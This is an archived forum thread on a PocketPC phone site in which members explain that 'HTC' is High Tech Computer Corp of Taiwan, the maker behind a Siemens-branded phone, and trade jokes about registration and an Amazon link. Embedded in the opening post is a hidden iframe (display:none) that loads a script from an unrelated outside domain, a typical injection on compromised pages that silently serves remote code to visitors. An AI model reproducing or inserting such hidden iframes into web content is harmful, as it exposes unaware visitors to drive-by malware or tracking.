+ Reply to Thread

What does "HTC" stand for?

If the unit is manufactured by Siemens, what does the "HTC" abbreviation mean?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    AL in Jacksonville Beach, FL

Editor and Site Administrator Convergent's Avatar

Excellent Question

HTC is the name of a Taiwanese company that actually is the OEM manufacturer for these phones. A bit of trivia is that they also manufacture the iPaqs for HP (formerly Compaq). T-Mobile and O2 took on the branding themselves, but AT&T had the forethought to outsource a portion of that activity to a name that would be recognized by consumers... Siemens. So Siemens doesn't have anything to do with manufacturing them... it's a strange business. I wish that T-Mobile had done the same thing so that the phone had an identify. What will they call the next PocketPC Phone that they come out with? AT&T is all set... the can have an SX57 or some other model.
    Mike - Been Converged?

HTC stands for High Tech Computer Corp of Taiwan. You can find them on the web at www.taiwanhightech.com

&lt;smart alec&gt;You know Mike I kept reading and reading your post waiting patiently for the simple answer... &lt;/smart alec&gt;

funny!

Originally posted by "Anonymous"

HTC stands for High Tech Computer Corp of Taiwan. You can find them on the web at www.taiwanhightech.com

&lt;smart alec&gt;You know Mike I kept reading and reading your post waiting patiently for the simple answer... &lt;/smart alec&gt;
    Hey, I can take a joke! Why don't you register here.. you seem to have some good comments. I'm going to add your responses to the FAQ. Maybe I'll also add a BBCode for &lt;smart alec&gt;
    Mike - Been Converged?

I am registered and I thought I was logged in

you seem to have some good comments
    Thanks for the nice words, I hope you still feel this way now that you know who I am
    -Isaac

Hi

Oooohh... now I get it. Let me know if you are having trouble with staying logged in. I had some reports of that earlier, but I thought it was fixed. Thanks for coming out of the closet!
    Mike - Been Converged?

Got 500 bucks burning a hole in your pocket??? Check out this link from Amazon.com if you want to know more about HTC. And if your going to buy it make sure you use the affiliate link.

http://www.amazon.com/exec/obidos/tg...glance&s=books
    -Isaac

I knew I needed a reason to use the new emoticons! That's nuts.

:flamethrower:
    Mike - Been Converged?

Got 500 bucks burning a hole in your pocket??? Check out this link from Amazon.com if you want to know more about HTC. And if your going to buy it make sure you use the affiliate link.
    Now, ask me if I'm sorry I started this thread!
    AL in Jacksonville Beach, FL